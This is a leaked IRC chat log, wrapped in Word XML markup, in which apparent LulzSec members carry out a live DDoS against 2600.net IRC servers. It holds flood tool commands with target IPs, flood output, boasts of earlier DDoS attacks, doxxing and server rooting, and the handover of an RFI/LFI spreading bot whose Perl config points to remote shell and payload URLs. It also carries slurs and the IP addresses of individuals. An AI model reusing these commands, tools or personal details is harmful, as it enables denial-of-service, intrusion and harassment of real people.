        <w:t>Jun 01 05:13:08 joepie92 nony News Jun 01 05:13:08 joepie92 &lt;lucid&gt; I think anonymous should host a free proxy server, that would be awesome - Will die laughing when @FBIPressOffice sets this one up.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:13:18 joepie92 (that was in #senloris, where schmoo is as well) Jun 01 05:13:19 joepie92 and idk Jun 01 05:13:35 Topiary we need to gather info and profile all these fags, backtrace crew/wiki crew/jester crew Jun 01 05:13:38 Topiary see where it all overlaps Jun 01 05:13:44 joepie92 Topiary, pm Jun 01 05:13:47 Topiary k Jun 01 05:13:51 storm DONT DO IT Jun 01 05:13:54 storm ITS A TRAP Jun 01 05:13:59 storm ;p Jun 01 05:14:36 Topiary it's okay he just wants to see my cock Jun 01 05:14:49 storm surprise Jun 01 05:14:51 lol is the whois a complete fake too?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:14:56 lol even the one at private whois?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:14:56 storm didnt know you had a cock Jun 01 05:16:16 storm 05:16 -!- storm [~stormeh@97-120-249- 224.ptld.qwest.net] Jun 01 05:16:17 storm 05:16 -!- ircname : stormeh Jun 01 05:16:17 storm 05:16 -!- channels : #telephreak #infoleak Jun 01 05:16:17 storm 05:16 -!- server : collective.2600.net [Arghhh, Scourge of the seven seas!] Jun 01 05:16:17 storm 05:16 -!- hostname : 97.120.249.224 Jun 01 05:16:21 storm WTF NIGGER Jun 01 05:16:35 storm get the fk off my name Jun 01 05:16:37 storm :( Jun 01 05:17:27 lol if it's not reg'd dos him off of it xD Jun 01 05:17:54 storm im gonna hit 3 ips actually Jun 01 05:17:54 storm ;p Jun 01 05:18:00 storm 05:17 djslocker.2600.net has address 173.165.207.25 Jun 01 05:18:00 storm 05:17 -!- Irssi: process 0 (host djslocker.2600.net) terminated with return Jun 01 05:18:00 storm code 0 Jun 01 05:18:00 storm 05:17 madjack.2600.net has address 216.86.158.122 Jun 01 05:18:00 storm 05:17 madjack.2600.net has IPv6 address 2607:f128:40:f00:fe31::3 Jun 01 05:18:00 storm 05:17 -!- Irssi: process 0 (host madjack.2600.net) terminated with return code 0 Jun 01 05:18:00 storm 05:17 collective.2600.net has address 208.111.35.75 Jun 01 05:18:05 lol :D Jun 01 05:18:16 lol or, lets go take over some chan on efet :D Jun 01 05:18:22 lol dos them all off :D Jun 01 05:18:25 storm lol Jun 01 05:18:29 storm either or Jun 01 05:18:30 storm ;D Jun 01 05:18:33 lol ;D Jun 01 05:18:39 * Topiary hops in iPredator VPN for the lulz and connects to 2600 Jun 01 05:18:46 storm i have too many channels on efnet Jun 01 05:18:52 lol let us do #phrack #cdej and #hackers Jun 01 05:18:59 storm | anonymous (unknown@dmvdetailing.com) (Commercial) Jun 01 05:18:59 storm : ircname : unbound by space or time.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:18:59 storm | channels : @#junkie @#malicious @#phear @#e @#syn @#jupiter @#addict @#juped Jun 01 05:18:59 storm @#geek @#overdose @#evil @#mayhem Jun 01 05:19:17 storm ;p Jun 01 05:19:52 lol or we can go to overthewire and give andrewg some shit :D Jun 01 05:21:03 Topiary sec, lemme get on something that isn't Japanese Jun 01 05:21:10 * Topiary has quit (Quit: true-story.pdf) Jun 01 05:21:20 joepie92 lol Jun 01 05:22:02 lol Whats wrong with Japan :(?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:23:42 storm godzilla lives tere Jun 01 05:23:44 storm there Jun 01 05:24:50 joepie92 I put a godzilla in your vpn so you can raep while you raep Jun 01 05:24:57 storm lol Jun 01 05:25:00 joepie92 amidoinitright?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:25:04 storm no Jun 01 05:25:23 joepie92 :( Jun 01 05:25:52 * t[2] (t@HA-vft.h6t.9puaba.IP) has joined #pure-elite Jun 01 05:26:03 storm that took forevar Jun 01 05:26:13 storm djslocker.2600.net down sons and daughters Jun 01 05:26:17 joepie92 lol Jun 01 05:26:18 * t[2] is now known as Topiary Jun 01 05:26:20 joepie92 wb Top Jun 01 05:26:29 * Topiary has quit (A TLS packet with unexpected length was received.) Jun 01 05:26:37 storm lol Jun 01 05:26:38 storm oops Jun 01 05:26:38 * Topiary (t@HA-vft.h6t.9puaba.IP) has joined #pure-elite Jun 01 05:26:45 joepie92 lol Jun 01 05:27:02 Topiary right Jun 01 05:27:07 storm Topiary Jun 01 05:27:13 storm get on 3600 Jun 01 05:27:14 storm er Jun 01 05:27:15 storm 2600 Jun 01 05:27:16 Topiary disregard two disconnects; forgot password, couldn't be bothered to type it right Jun 01 05:27:16 storm lD Jun 01 05:27:18 storm ;D Jun 01 05:27:20 Topiary okay dude Jun 01 05:27:24 Topiary I'm in Switzerland right nao :D Jun 01 05:27:30 storm hot Jun 01 05:27:31 joepie92 lolol Jun 01 05:27:44 joepie92 pm again btw :P Jun 01 05:29:18 storm 05:29 -!- |- djslocker.2600.net ---------------------- - | Users: 26 Jun 01 05:29:20 storm roflol Jun 01 05:29:26 Topiary okay I'm on Jun 01 05:29:28 Topiary where we at?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:29:31 storm ./map Jun 01 05:29:34 storm look at djs Jun 01 05:29:53 Topiary heh 30 people Jun 01 05:30:02 Topiary sec reading shit Jun 01 05:33:01 storm madjack.2600.net nao Jun 01 05:33:02 storm ;D Jun 01 05:33:32 storm 64 packets transmitted, 8 received, 87% packet loss, time 62994ms Jun 01 05:33:49 lol :D Jun 01 05:33:54 storm its nulled Jun 01 05:34:36 lol hahah Jun 01 05:34:47 storm 67 packets transmitted, 0 received, 100% packet loss, time 65992ms Jun 01 05:34:50 storm lol Jun 01 05:34:52 storm :] Jun 01 05:35:16 lol can you hit this ip 69.164.198.161 :D it's some fag on 2600 in #lulzsec we're going to take over the channel :D Jun 01 05:35:26 lol he is only person in there :D Jun 01 05:36:23 storm what server is he on Jun 01 05:36:27 storm he'll just ping out anyway Jun 01 05:37:41 lol madjack.2600.net Jun 01 05:37:53 * Topiary is on collective Jun 01 05:38:04 Topiary * [ego] (~ego@46.19.143.19): ego Jun 01 05:38:06 Topiary don't DDoS me pl0x Jun 01 05:38:11 storm madjacks dead Jun 01 05:38:15 storm so just wait for him to die Jun 01 05:39:32 storm er wait na madjacks back xD Jun 01 05:39:41 Topiary I just got disconnected from collective Jun 01 05:39:42 storm its null lasts like 5 - 6 minutes Jun 01 05:39:45 storm orly Jun 01 05:40:47 Topiary reconnected to djs Jun 01 05:40:54 storm yeah same Jun 01 05:40:54 Topiary expecting a ping on collective Jun 01 05:41:16 storm can you get a map?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:42:02 storm looks like we pissed these guys off so bad that they upped some of their boxes filtering Jun 01 05:42:11 storm lululul Jun 01 05:42:26 lol :D Jun 01 05:42:36 storm OH Jun 01 05:42:38 storm mads gone Jun 01 05:42:43 storm did that guy ping?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:43:04 Topiary yeah Jun 01 05:43:08 storm gg Jun 01 05:43:18 lol i can't even connect to 2600 xD Jun 01 05:43:22 storm lmfao Jun 01 05:43:30 storm 05:43 -!- egotistical [~ego@46.19.143.19] has joined #lulzsec Jun 01 05:43:30 storm 05:43 &lt; egotistical&gt; bitches Jun 01 05:43:32 storm ROFL Jun 01 05:43:36 storm that you?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:43:42 storm or the guy who was in there befiore Jun 01 05:43:44 storm before even Jun 01 05:43:49 Topiary it's me Jun 01 05:43:51 lol thts Topiary Jun 01 05:43:55 storm oh i c Jun 01 05:43:56 Topiary for some reason my collective shit hasn't pinged Jun 01 05:43:57 storm xD Jun 01 05:44:05 storm it will if i let off of it Jun 01 05:44:14 storm i think Jun 01 05:44:14 lol Topiary what server are you connected to?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:44:14 storm that or their ping timeouts super high Jun 01 05:44:14 Topiary djs Jun 01 05:44:19 storm djslock Jun 01 05:44:20 Topiary should be 240 secs Jun 01 05:44:21 lol .net?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:44:24 storm ya Jun 01 05:44:37 Topiary * djslocker.2600.net ------------------------------- | Users: 111 (63.4%) Jun 01 05:44:37 Topiary * '- blackbeard.2600.net -------------------------- | Users: 0 (0.0%) Jun 01 05:44:37 Topiary * |- collective.2600.net ---------------------- | Users: 55 (31.4%) Jun 01 05:44:37 Topiary * '- services.2600.net ------------------------ | Users: 9 (5.1% Jun 01 05:44:44 Topiary these guys are so fun to fuck Jun 01 05:45:01 storm dont worry djs is next Jun 01 05:45:02 storm &gt;:LD Jun 01 05:45:04 storm &gt;:D Jun 01 05:45:27 lol wait :D let us troll the shit out of them first :D Jun 01 05:45:50 lol then we can PUSH/SYN/ACK/UDP them to oblivion hahahahahahaha Jun 01 05:45:57 storm ewwwwwwwww Jun 01 05:46:00 storm YOU SAID UDP Jun 01 05:46:02 storm !!!!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:46:04 lol :o Jun 01 05:46:06 storm i am using urg Jun 01 05:46:09 storm atm Jun 01 05:46:17 lol UDP is ok, if you hit ports at rand Jun 01 05:46:22 storm well Jun 01 05:46:30 storm i had access to these great britian boxes Jun 01 05:46:32 storm those + udp Jun 01 05:46:34 storm were sexy Jun 01 05:47:03 lol i used to load about 8,000 RFI with usp flooder crushed most server :D Jun 01 05:47:09 lol udp* Jun 01 05:47:16 lol it used to hit ports at random Jun 01 05:47:17 lol :D Jun 01 05:47:35 Topiary I imagine it would Jun 01 05:48:09 lol i ddos'd enturbulation.org, whyweprotest, anonnet for about 3 week with it all :DDDDD Jun 01 05:48:18 storm haha Jun 01 05:48:22 Topiary ahaha that was you?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:48:24 storm i only use TCP Jun 01 05:48:26 lol yes :D Jun 01 05:48:31 Topiary Gregg Housh was bitching about that Jun 01 05:48:42 lol alot of people we're bitching about it Jun 01 05:48:48 lol let me show you Jun 01 05:49:01 lol i dont care if this USB infects me because it's funny to show you this :D Jun 01 05:49:39 storm Flood completed, 41784641 packets sent, 75 seconds, 557128 packets/sec Jun 01 05:49:42 storm nulled madjack Jun 01 05:49:45 storm again Jun 01 05:50:47 lol it's actually not infected :D Jun 01 05:51:13 storm yay Jun 01 05:51:15 * joepie92 remembers an UDP flood on this home IP Jun 01 05:51:23 storm [05:51] [storm__(+i)] [2:djslocker/#lulzsec(+nt)] [Lag: 51 (??)] Jun 01 05:51:23 Topiary pretty sure I just pinged from djs Jun 01 05:51:25 lol storm would you also like the RFI/LFI bot with google bypass i was talking about while i have this plugged in?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:51:29 storm rofl Jun 01 05:51:31 storm Topiary Jun 01 05:51:32 storm &lt;3 Jun 01 05:51:39 storm yes Jun 01 05:51:43 storm i would kayla Jun 01 05:51:44 storm :) Jun 01 05:51:44 joepie92 a while ago I had ~20 shared hosting servers UDP flooding my modem...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:51:53 joepie92 not sure how it didn't melt Jun 01 05:52:07 storm Sending packets of size 40....x 208.111.35.75 218.108.235.225 6667 0 20 0 Jun 01 05:52:13 storm [root@node1(~/opt/.local)]#./nsdapx 173.165.207.25 0 6667 0 20 0 Jun 01 05:52:16 storm both at same time Jun 01 05:52:17 storm lol Jun 01 05:52:20 lol i dont know if the bypass will still work it is a old bot :D Jun 01 05:52:21 Topiary welp, they're fucked Jun 01 05:52:25 lol but we will see :D Jun 01 05:52:26 storm and madjacks nulled Jun 01 05:52:26 storm dude Jun 01 05:52:34 storm theyre not gonna have anywhere to chatr Jun 01 05:52:36 storm chat* Jun 01 05:52:37 Topiary by the way, they think we're firing botnets that can only keep it down for 10 mins at a time Jun 01 05:52:46 storm lol Jun 01 05:52:50 storm theyre retarded Jun 01 05:52:51 storm xD Jun 01 05:53:08 Topiary okay so everything is down? madjack nulled, collective out, djs out, what about blackbeard?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:53:14 storm 05:52 -!- bottle_of_rum [~bottle_of@189-39-145- 108.gru.flash.tv.br] has quit Jun 01 05:53:14 storm [Ping timeout: 240 seconds] Jun 01 05:53:16 storm LOL Jun 01 05:53:29 storm [Lag: 176 (??)] Jun 01 05:53:38 Topiary mine's about to go if it hasn't already Jun 01 05:53:51 storm 05:53 -!- ego [~ego@46.19.143.19] has quit [Ping timeout: 240 seconds] Jun 01 05:53:52 storm did Jun 01 05:54:04 storm [Lag: 211 (??)] Jun 01 05:54:06 Topiary * Connecting to irc.2600.net (94.125.252.114) port 6667...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:54:06 Topiary * Connecting to irc.2600.net (173.165.207.25) port 6667...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:54:08 Topiary failed Jun 01 05:54:11 storm :D Jun 01 05:54:21 Topiary oh shit I'm in on 173 Jun 01 05:54:22 storm 05:54 -!- ERROR Closing Link: c-68-56-76- 36.hsd1.fl.comcast.net (Ping timeout: Jun 01 05:54:22 storm 240 seconds) Jun 01 05:54:22 storm 05:54 -!- Irssi: Connection lost to djslocker.2600.net Jun 01 05:54:22 storm 05:54 -!- Irssi: Removed reconnection to server djslocker.2600.net port 6667 Jun 01 05:54:22 storm 05:54 -!- Irssi: Looking up djslocker.2600.net Jun 01 05:54:22 storm 05:54 -!- Irssi: Reconnecting to djslocker.2600.net [173.165.207.25] port 6667 Jun 01 05:54:22 storm - use /RMRECONNS to abort Jun 01 05:54:24 Topiary slooooowly Jun 01 05:54:41 storm i let off Jun 01 05:54:44 storm wanna check users Jun 01 05:54:45 storm ;x Jun 01 05:54:47 Topiary * collective.2600.net ------------------------------ | Users: 114 (30.2%) Jun 01 05:54:47 Topiary * '- blackbeard.2600.net -------------------------- | Users: 0 (0.0%) Jun 01 05:54:48 Topiary * |- madjack.2600.net ------------------------- | Users: 132 (35.0%) Jun 01 05:54:48 Topiary * |- djslocker.2600.net ----------------------- | Users: 122 (32.4%) Jun 01 05:54:48 Topiary * '- services.2600.net ------------------------ | Users: 9 (2.4% Jun 01 05:55:06 storm 05:54 -!- djslocker.2600.net ------------------------- ------ | Users: 95 Jun 01 05:55:06 storm (29.3%) Jun 01 05:55:06 storm 05:54 -!- '- blackbeard.2600.net --------------------- ----- | Users: 0 Jun 01 05:55:06 storm (0.0%) Jun 01 05:55:06 storm 05:54 -!- |- madjack.2600.net ------------------------ - | Users: 132 Jun 01 05:55:06 storm (40.7%) Jun 01 05:55:06 storm 05:54 -!- |- collective.2600.net --------------------- - | Users: 88 Jun 01 05:55:06 storm (27.2%) Jun 01 05:55:06 storm 05:54 -!- '- services.2600.net ----------------------- - | Users: 9 Jun 01 05:55:09 storm you're off Jun 01 05:55:11 storm i think Jun 01 05:55:47 Topiary still going strong Jun 01 05:55:49 storm madjacks done Jun 01 05:56:36 Topiary * bottle_of_rum has quit (Ping timeout: 240 seconds) Jun 01 05:56:36 Topiary * ego has quit (Ping timeout: 240 seconds) Jun 01 05:56:37 Topiary * storm__ has quit (Ping timeout: 240 seconds Jun 01 05:56:37 Topiary LOL Jun 01 05:56:43 storm lolol Jun 01 05:57:48 lol Topiary: So yeh, the thing with anonnet, entub, whywe protest all started because my friend C ddos'd anonnet and i got the blame for it, genome was ranting at me for ages saying my ddos was pathetic when it wasn't even me who ddos'd him Jun 01 05:57:59 lol so i thought "fuck it, ill show you ddos" Jun 01 05:58:11 lol kept enturb, wwp, anonnet down for 3 weeks Jun 01 05:58:14 Topiary good idea Jun 01 05:58:23 lol then genome was demanding my dox Jun 01 05:58:26 lol so i dox'd him Jun 01 05:58:29 lol see this Jun 01 05:58:52 lol http://www.aminsb.org/administrator/sec/lols/genome.txt Jun 01 05:59:05 lol he raged like fuck for ages Jun 01 05:59:11 lol threatening all kinds Jun 01 05:59:14 lol so i did this Jun 01 05:59:30 lol http://www.aminsb.org/administrator/sec/lols/anonnet.txt Jun 01 05:59:35 lol rooted tht shit :D Jun 01 05:59:48 lol after tht he p much gave up :D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06:00:04 Topiary * collective.2600.net ------------------------------ | Users: 152 (55.1%) Jun 01 06:00:06 Topiary * '- blackbeard.2600.net -------------------------- | Users: 0 (0.0%) Jun 01 06:00:08 Topiary * |- djslocker.2600.net ----------------------- | Users: 115 (41.7%) Jun 01 06:00:10 Topiary * '- services.2600.net ------------------------ | Users: 9 (3.3%) Jun 01 06:00:11 storm lol Jun 01 06:00:12 Topiary ruh roh, madjack's gone Jun 01 06:00:14 storm XD Jun 01 06:01:53 Topiary let's just let 'em up and troll under different types of weather Jun 01 06:01:56 Topiary you be storm, I be whirlpool Jun 01 06:01:59 Topiary kayla be tornado Jun 01 06:02:18 storm xD Jun 01 06:02:25 joepie92 ... a whirlpool isn't weather?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:02:31 storm LMFAO Jun 01 06:02:46 Topiary YES IT IS JOEPIE Jun 01 06:02:54 joepie92 lolno Jun 01 06:02:54 Topiary GOSH JOEPIE Jun 01 06:03:10 joepie92 lolno it r not Jun 01 06:03:30 Topiary okay, let's troll under names of natural disasters Jun 01 06:03:32 Topiary you be storm Jun 01 06:03:35 Topiary I be whirlpool Jun 01 06:03:38 Topiary joepie be joepie Jun 01 06:03:38 storm lmao Jun 01 06:03:40 Topiary &gt;:[ Jun 01 06:03:42 joepie92 LOL Jun 01 06:03:50 joepie92 also a whirlpool is not a natural disaster Jun 01 06:03:56 Topiary listen bro Jun 01 06:04:01 Topiary I've seen PotC 3 Jun 01 06:04:06 joepie92 "natural occurences" would probably be more accurate Jun 01 06:04:06 joepie92 :) Jun 01 06:04:07 Topiary and that thing fucks shit up Jun 01 06:04:12 joepie92 occurrences*?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:04:15 joepie92 herpderpenglish Jun 01 06:04:19 lol storm: http://www.aminsb.org/administrator/sec/lols/d0ngs.rar Jun 01 06:04:22 lol tht bot :D Jun 01 06:04:29 joepie92 A whirlpool is a swirling body of water usually produced by ocean tides. The vast majority of whirlpools are not very powerful. More powerful ones are more properly termed maelstroms. Vortex is the proper term for any whirlpool that has a downdraft. Very small whirlpools can easily be seen when a bath or a sink is draining, but these are produced in a very different manner from those in nature. Smaller whirlpools Jun 01 06:04:30 joepie92 also appear at the base of many waterfalls.[1] In the case of powerful waterfalls, like Niagara Falls, these whirlpools can be quite strong. The most powerful whirlpools are created in narrow shallow straits with fast flowing water.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:04:32 storm tyty Jun 01 06:04:54 lol you need to set all the files up on a server Jun 01 06:05:04 storm lol im already wgetting it somewhere Jun 01 06:05:09 Topiary &gt;whirlpool is now known as maelstrom Jun 01 06:05:20 joepie92 lol Jun 01 06:05:26 Topiary &gt;enemy ship is now known as driftwood Jun 01 06:05:30 lol liek the shell, phpbot if you want it to spread and the perl bot to spread and the id's aswell as the google.php thts the google bypas but i dont know if the google bypass still works Jun 01 06:05:31 joepie92 ahahaha Jun 01 06:06:06 lol ##[ KONFIGURASI URL ]## Jun 01 06:06:06 lol my $fx29id = "http://reichenthal.at/pages/s/idxx.txt????"; #Fx29ID (Simple) / (Advanced) Jun 01 06:06:06 lol my $fx29id2 = "http://reichenthal.at/pages/s/id2.txt????"; #Fx29ID (Advanced) Jun 01 06:06:07 lol my $fx29sh = "http://reichenthal.at/pages/s/sh.txt????"; #Fx29Sh (Optional) Jun 01 06:06:07 lol my $bypass = "http://reichenthal.at/pages/s/google.php"; #Google Bypasserz (Optional) Jun 01 06:06:26 joepie92 &gt;enemy is now known as drowning man Jun 01 06:06:39 storm 06:03 -!- Irssi: Connection to collective.2600.net established Jun 01 06:06:39 storm 06:03 !collective.2600.net * * * Looking up your hostname...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:06:39 storm 06:03 !collective.2600.net * * * Checking Ident Jun 01 06:06:39 storm 06:03 !collective.2600.net * * * No Ident response Jun 01 06:06:39 storm 06:04 !collective.2600.net * * * Found your hostname Jun 01 06:06:39 storm 06:04 -!- ERROR Closing Link: c-68-56-76- 36.hsd1.fl.comcast.net (Registration Jun 01 06:06:39 storm timed out) Jun 01 06:06:53 storm 06:06 -!- Irssi: Looking up djslocker.2600.net Jun 01 06:06:53 storm 06:06 -!- Irssi: Connecting to djslocker.2600.net [173.165.207.25] port 6667 Jun 01 06:07:14 storm madjacks back Jun 01 06:07:19 lol storm: you got the file so i can delete it?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:07:25 storm sec Jun 01 06:07:28 storm ya Jun 01 06:07:29 storm got it Jun 01 06:07:32 lol :) Jun 01 06:07:50 lol there's alot to config in it :O Jun 01 06:08:05 lol but hopefully the google bypass "google.php" will still work :D Jun 01 06:08:09 storm i wouldnt know, it looks like a rar file :P Jun 01 06:08:14 storm it is a rar file!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:08:19 storm FARKIN HELL Jun 01 06:08:20 storm lol Jun 01 06:08:23 lol *windows* Jun 01 06:08:24 lol xD Jun 01 06:08:27 storm what kind of linux hacked box has rar Jun 01 06:08:27 storm !!!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:09:13 lol xD Jun 01 06:09:34 storm 06:09 -!- |- djslocker.2600.net ---------------------- - | Users: 21 Jun 01 06:10:48 Topiary collective.2600.net ------------------------------ | Users: 80 (38.8% Jun 01 06:11:10 storm lmao Jun 01 06:11:11 storm dude Jun 01 06:11:16 storm i took down everything then Jun 01 06:11:20 storm cause madjacks nulled Jun 01 06:11:35 Topiary just got kicked off collective Jun 01 06:11:45 storm lolz Jun 01 06:11:50 Topiary we should just do this every day until they refuse to house Jester Jun 01 06:11:51 storm should i let it back up?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:12:05 Topiary whatever you want Jun 01 06:12:13 storm k Jun 01 06:13:49 Topiary or maybe we should just pwn 2600.net itself Jun 01 06:16:21 storm well that was fun XD Jun 01 06:17:48 Topiary I love their little clique circlejerks Jun 01 06:17:55 Topiary they all have a little retweet party with themselves Jun 01 06:18:11 storm they tweeting?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:19:00 Topiary yeah check out the feeds of @mach2600 @fakegregghoush @awinee and all retweets Jun 01 06:19:15 Topiary these are the same guys who specifically went after Sabu + our crew back in Feb with HBGary Jun 01 06:19:24 Topiary they're a lovable bunch of scoundrels Jun 01 06:21:10 Topiary err, madjack just disappeared :x Jun 01 06:22:00 storm lol Jun 01 06:25:04 joepie92 disappeared as in...?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
